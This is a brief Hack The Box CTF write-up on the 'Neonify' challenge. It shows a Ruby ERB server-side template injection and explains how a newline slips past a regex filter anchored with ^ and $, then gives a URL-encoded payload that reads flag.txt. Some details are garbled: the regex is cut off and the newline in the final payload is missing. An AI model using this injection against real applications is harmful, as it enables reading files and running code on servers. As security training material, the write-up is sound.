Ruby SSTI Bypass Validation Regex

Related to : What Is Cyber Security ❓, CTF
Tags : #ssti , #htb

So this is the part of the HTB Chall call "Neonify", The server identifed affected ssti , this is the part of the code that shows of the vuln :

controllers/neon.rb

 post '/' do
    if params[:neon] =~ /^[0-9a-z ]+$/i
      @neon = ERB.new(params[:neon]).result(binding)
    else
      @neon = "Malicious Input Detected"
    end
    erb :'index'
  end

`
views/index.erb

<body>
    <div class="wrapper">
        <h1 class="title">Amazing Neonify Generator</h1>
        <form action="/" method="post">
            <p>Enter Text to Neonify</p><br>
            <input type="text" name="neon" value="">
            <input type="submit" value="Submit">
        </form>
        <h1 class="glow"><%= @neon %></h1>
    </div>
</body>

As you can see the neon put into the index without sanitization, you can check the vuln source code in here :

Neonify.zip

Alright so the normal payload will be : <%= File.open('flag.txt').read %>
But we cant use this because it not pass the statement of /^[1]+

` within regex’s in Ruby is bypassable.
So to bypass this , i reffer to this solution : https://stackoverflow.com/questions/577653/difference-between-a-z-and-in-ruby-regular-expressions/577675#577675

you can bypass it using new line (/n) so the payload it will be ( the % is results for url encoding ) :
neon=a <%25%3d+File.open('flag.txt').read+%25>

0-9a-z ↩︎